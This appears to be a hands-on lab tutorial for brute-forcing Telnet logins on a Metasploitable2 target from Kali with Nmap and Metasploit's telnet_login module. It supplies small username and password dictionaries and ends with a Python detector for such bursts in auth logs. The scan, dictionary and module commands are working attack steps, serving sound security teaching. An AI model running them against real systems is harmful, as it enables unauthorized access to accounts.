Introduction
In this lab, we will learn how to exploit a weak-credential vulnerability in the Telnet service and carry out a penetration test. The scenario uses a Kali Linux machine as the attacking machine and the Metasploitable2 virtual machine as the target. The objective is to scan the target for open services, identify the vulnerable Telnet service, and exploit it with the Metasploit Framework.
Start the Lab Environment
In this step, we will start the lab environment, which includes the Kali Linux container and the Metasploitable2 virtual machine.
- Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
Wait for the target machine to start; this may take 1-3 minutes.
- Test the connectivity to the target machine by pinging it:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
- Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
- Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
Now both the attack machine and the target machine are running, and you can start the penetration testing.
Note: If you accidentally exit the current bash shell, the Kali container stops automatically. Run docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.
Perform Vulnerability Scanning
In this step, we will use Nmap to scan the target machine for open ports and services.
First, start the PostgreSQL database, as Metasploit requires it for data storage:
service postgresql start
msfdb init
cd ~
msfconsole
Within the Metasploit console, run the Nmap scan against the target machine:
nmap -sV -T4 192.168.122.102
The -sV option probes each open port to determine the service and version running on it (this is what produces the Telnet banner used in the next step), while -T4 selects the scan timing template (0-5; higher values are faster but noisier and easier to detect).
Analyze the Scan Results
In this step, we will analyze the Nmap scan results to identify the vulnerable Telnet service.
The Nmap scan output shows that the Telnet service is running on port 23 with the banner "Linux telnetd". Let's search for the corresponding Metasploit module:
search scanner/telnet
Use the auxiliary/scanner/telnet/telnet_login module:
use auxiliary/scanner/telnet/telnet_login
Show the module options:
show options
The required option is RHOSTS, which specifies the target host(s).
Press Ctrl+D to quit the Metasploit console, then start the inspection.
Prepare the Username and Password Dictionary
In this step, we will prepare the username and password dictionary files for the login brute-force attack.
Open a new terminal and connect to the Kali container:
docker run -ti --network host b5b709a49cd5 bash
Create a file username.txt in the / directory with the following usernames:
123456
admin
msfadmin
root
kali
Create another file password.txt in the / directory with the following passwords:
abc123
1234
123456
root
msfadmin
admin
toor
These files will be used as the username and password dictionaries for the brute-force attack.
Configure the Metasploit Module
In this step, we will configure the Metasploit module with the target host, username dictionary, and password dictionary.
If you are not already in the Metasploit console, start it:
cd ~
msfconsole
Use the auxiliary/scanner/telnet/telnet_login module:
use auxiliary/scanner/telnet/telnet_login
Set the target host:
set RHOSTS 192.168.122.102
Set the username dictionary file:
set USER_FILE /username.txt
Set the password dictionary file:
set PASS_FILE /password.txt
Finally, run the module:
exploit
Metasploit tries each username and password combination from the two dictionaries in turn. If a valid credential is found, it is displayed in green.
In this case, the valid credential is msfadmin/msfadmin.
Press Ctrl+D to quit the Metasploit console, then start the inspection.
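From the defender's side, the telnet_login run above leaves a tight burst of failed logins from one source address in the target's auth log, followed by a success once msfadmin/msfadmin is hit. The detector below is an added example, not part of the lab or of Metasploit; it runs over constructed auth.log lines whose wording (the Linux login program's FAILED LOGIN and LOGIN ON messages) is an assumption that you should check against your own systems' logs.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth.log lines; the exact wording of the Linux `login`
# program's messages is an assumption, adjust the regexes to your own logs.
SAMPLE_LOG = """\
Jun 10 12:00:01 target login[4321]: FAILED LOGIN (1) on 'pts/1' from '192.168.122.1' FOR 'admin', Authentication failure
Jun 10 12:00:02 target login[4322]: FAILED LOGIN (1) on 'pts/1' from '192.168.122.1' FOR 'root', Authentication failure
Jun 10 12:00:02 target login[4323]: FAILED LOGIN (1) on 'pts/1' from '192.168.122.1' FOR 'kali', Authentication failure
Jun 10 12:00:03 target login[4324]: FAILED LOGIN (1) on 'pts/1' from '192.168.122.1' FOR 'root', Authentication failure
Jun 10 12:00:03 target login[4325]: FAILED LOGIN (1) on 'pts/1' from '192.168.122.1' FOR 'admin', Authentication failure
Jun 10 12:00:04 target login[4326]: LOGIN ON pts/1 BY msfadmin FROM 192.168.122.1
Jun 10 12:30:00 target login[4400]: FAILED LOGIN (1) on 'pts/2' from '192.168.122.50' FOR 'alice', Authentication failure
Jun 10 12:30:05 target login[4401]: LOGIN ON pts/2 BY alice FROM 192.168.122.50
"""

HEAD = r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: "
FAIL_RE = re.compile(HEAD + r"FAILED LOGIN \(\d+\) on '[^']*' from '(?P<ip>[^']+)' FOR '(?P<user>[^']*)'")
OK_RE = re.compile(HEAD + r"LOGIN ON \S+ BY (?P<user>\S+) FROM (?P<ip>\S+)")

def _ts(text):
    # Syslog timestamps carry no year; the default year is fine for ordering.
    return datetime.strptime(text, "%b %d %H:%M:%S")

def detect_telnet_bruteforce(log_text, threshold=5, window_sec=60):
    """Return (kind, ip, failure_count, usernames_tried) for each flagged source IP.
    kind is 'bruteforce' when an IP reaches threshold failures within a sliding
    window_sec window, and 'bruteforce-success' when a successful login from the
    same IP follows while that window is still hot (the telnet_login outcome)."""
    window = timedelta(seconds=window_sec)
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    users = defaultdict(set)      # ip -> usernames attempted
    findings = {}
    for line in log_text.splitlines():
        if m := FAIL_RE.match(line):
            ip, now = m["ip"], _ts(m["ts"])
            q = recent[ip]
            q.append(now)
            users[ip].add(m["user"])
            while now - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                findings.setdefault(ip, "bruteforce")
        elif (m := OK_RE.match(line)) and findings.get(m["ip"]) == "bruteforce":
            if _ts(m["ts"]) - recent[m["ip"]][-1] <= window:
                findings[m["ip"]] = "bruteforce-success"
    return [(kind, ip, len(recent[ip]), sorted(users[ip])) for ip, kind in findings.items()]
```

A single mistyped password from 192.168.122.50 is below the threshold and is not reported, while the dictionary run from 192.168.122.1 is reported as a brute force that ended in a successful login.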
Summary
In this lab, we learned how to exploit the Telnet service vulnerability using the Metasploit Framework. We started by setting up the lab environment with the Kali Linux attacking machine and the Metasploitable2 target machine. We then performed vulnerability scanning using Nmap to identify the open Telnet service. Next, we prepared the username and password dictionaries and configured the Metasploit module with the target host and dictionary files. Finally, we executed the exploit and successfully brute-forced the Telnet login credentials.
This lab provided hands-on experience in penetration testing, vulnerability scanning, and utilizing the Metasploit Framework for exploiting vulnerabilities. It highlighted the importance of secure password practices and the potential risks of using weak or easily guessable credentials.